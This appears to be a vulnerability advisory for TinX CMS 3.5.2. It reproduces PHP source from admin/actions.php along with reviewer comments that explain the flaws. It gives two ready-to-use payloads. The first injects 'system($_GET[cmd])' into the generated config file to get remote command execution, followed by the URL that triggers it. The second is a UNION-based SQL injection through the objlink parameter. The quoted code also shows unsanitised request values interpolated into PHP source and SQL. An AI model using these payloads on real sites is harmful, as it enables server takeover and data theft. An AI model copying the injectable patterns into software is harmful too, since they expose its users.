
Product: TinX CMS
Author: cms.tinx.dk
Version: 3.5.2
Need: magic_quotes_gpc = off, register_globals = on
Remote Code Execution
File: /admin/actions.php
PHP код:
// NOTE(review): excerpt of the settings-save handler; the closing brace of this `if` is not part of the listing.
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) {
//echo "POST(".$_POST["cmsadmin"].")<br>";
// Every setting below is copied from the request body as-is: no allow-list, no type check, no escaping.
$defaultdocumentid = $_POST["defaultdocumentid"];
$language = $_POST["language"];
$appendToTitle = $_POST["appendToTitle"];
$www = $_POST["www"];
$theme = $_POST["theme"];
$theme = $_POST["theme"]; // duplicate of the previous line
$template = $_POST["template"];
$loginsystem = $_POST["loginsystem"];
$companyName = $_POST["companyName"];
$siteDesign = $_POST["siteDesign"];
$searchresult_quickid = $_POST["searchresult_quickid"];
$contact_quickid = $_POST["contact_quickid"];
$sitemap_quickid = $_POST["sitemap_quickid"];
$max_root_documents = $_POST["max_root_documents"];
//phpinfo();
// Timestamp for the backup copy; "h" is the 12-hour hour, so two saves twelve hours apart get the same name.
$d = date("Y-m-d_h-i-s", time());
// Backup via a shell command: the source path comes from $system["DOCUMENT_ROOT"] but the
// destination from $_SERVER["DOCUMENT_ROOT"], and neither path is quoted for the shell.
// copy() would do the same job without spawning a shell.
exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] .
"/inc/customer_config_$d.php");
$cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php";
$fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!");
// The heredoc is the new customer_config.php, a PHP file under the web root. The request values are
// placed inside double-quoted PHP string literals without any escaping, so a value containing a
// double quote terminates the literal and the remainder of the value is written out as PHP source.
// Emitting each value with var_export() (or rejecting anything outside an allowed character set
// before it gets here) keeps the values as data rather than code.
$write = <<< html
<?php
/************************************************
Settings that can be changed - TinX/cms
*************************************************/
\$appendToTitle = "$appendToTitle";
\$companyName = "$companyName";
\$language = "$language"; /* da = danish, en=english.... make some up */
\$defaultdocumentid = "$defaultdocumentid"; /* If index.php is launched, this document id is called */
\$searchresult_quickid = "$searchresult_quickid"; /* search page QuickID */
\$contact_quickid = "$contact_quickid"; /* contact page QuickID */
\$sitemap_quickid = "$sitemap_quickid"; /* sitemap page QuickID */
\$max_root_documents = "$max_root_documents"; /* Max number of root elements in menu */
\$www = "$www"; // Url til websitet
\$theme["name"] = "$theme";
\$antalStatus = 2;
\$statusNames[0] = "Aktiv"; /* statusNames indeholder statuskoder for dokumentet - aktiv/inaktiv mv */
\$statusNames[1] = "Inaktiv";
/* Google Webmaster tools */
\$googlesitemap_path = \$www . "/googlesitemap.xml";
/* Show/Hide indtastningsfelter pе settings.php:
Skal feltet skjules intastes en default værdi, ellers "" */
\$settings_options["documenttitle"] = "";
\$settings_options["category"] = "Standard";
\$settings_options["template"] = "$template";
// LOGIN TYPE
\$login_system = "$loginsystem"; //values: phpBB - TinX
// Other settings
\$siteDesign = "$siteDesign";
\$siteDesignPath = "designs/" . \$siteDesign;
\$siteTemplatePath = "designs/" . \$siteDesign ."/templates/";
\$siteContainerPath = "designs/" . \$siteDesign ."/containers/";
if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php"))
include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php");
else
echo "### ERROR: customer_vars.php NOT FOUND ###";
?>
html;
// Return values of fputs()/fclose() are not checked; a short write leaves a truncated config file behind.
fputs($fh, $write);
fclose($fh);
// ... listing truncated here; the closing brace of the outer `if` is not shown.
Target: {POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die();
http://yousite.com/inc/customer_config.php?cmd=dir
SQL injection
File: /admin/actions.php
PHP код:
// NOTE(review): excerpt of the object-creation handler; the closing brace of this `if` is not part of the listing.
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"]
=== "create") {
// Request values copied as-is; none is validated before use.
$id = $_POST["docid"];
$type = $_POST["objtype"];
$title = $_POST["objtitle"];
$location = $_POST["objlocation"];
$container = $_POST["objcontainer"];
$objlink = $_POST["objlink"];
$is_copy_of = $_POST["objlinkSubCat"];
// Loose comparisons: $type is compared with ==, and $is_copy_of is a string compared numerically with > 0.
if ($type == "existingContent" && $is_copy_of > 0) {
$obj_table = $objlink;
// $objlink is placed verbatim into the WHERE fragment, which selectQuery() interpolates straight into
// the SQL text. It has to be escaped with the driver's escaping function, or better, checked against
// the set of known object-template table names before it is used as both a value here and a table name above.
$type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"],
"tablename='$objlink'"));
$type = $type[0];
$insert_as_copy = true;
} else {
$insert_as_copy = false;
$objlink = "";
$is_copy_of = "0";
}
// ... listing truncated here; the closing brace of the outer `if` is not shown.
$sqlPtr->selectQuery();
PHP код:
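/**
 * Runs a SELECT on the current MySQL connection and returns the raw result resource.
 *
 * All four arguments are interpolated into the SQL text verbatim, so this method offers no
 * protection of its own: callers must pass only trusted or already-escaped fragments, and
 * request parameters must never reach $where or $other unescaped.
 *
 * @param string $what      column list placed after SELECT
 * @param string $tablename table name placed after FROM
 * @param string $where     optional condition, without the WHERE keyword
 * @param string $other     optional trailing clauses (ORDER BY, LIMIT, ...)
 * @return resource|false   result of mysql_query(); false on failure, after error_message() was called
 */
function selectQuery($what, $tablename, $where = "", $other = "")
{
    $this->antalLookups++;
    if (strcmp($where, "") != 0) {
        $where = "WHERE $where";
    }
    $q = "SELECT $what FROM $tablename $where $other";
    if ($this->isDebug) {
        // Debug output identifies the connection but deliberately omits the password,
        // which the original version echoed to the page.
        echo "Query($q)<br>\n";
        echo "HOST($this->dbhost)<br>\n";
        echo "USER($this->dbusername)<br>\n";
        echo "DB($this->default_dbname)<br>\n";
    }
    $result = mysql_query($q);
    if (!$result) {
        // The original message interpolated an undefined $delete variable; it carried no information.
        $this->error_message($this->sql_error() . "<br><b>selectQuery($q) error</b>: connected but not to table");
    }
    return $result;
}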
Target: {POST} ?objectaction=create&objectcreate=1&objlinkSubCat= 1&objtype=existingContent&objlink=1'+union+select+ 1,2,3,4,5/*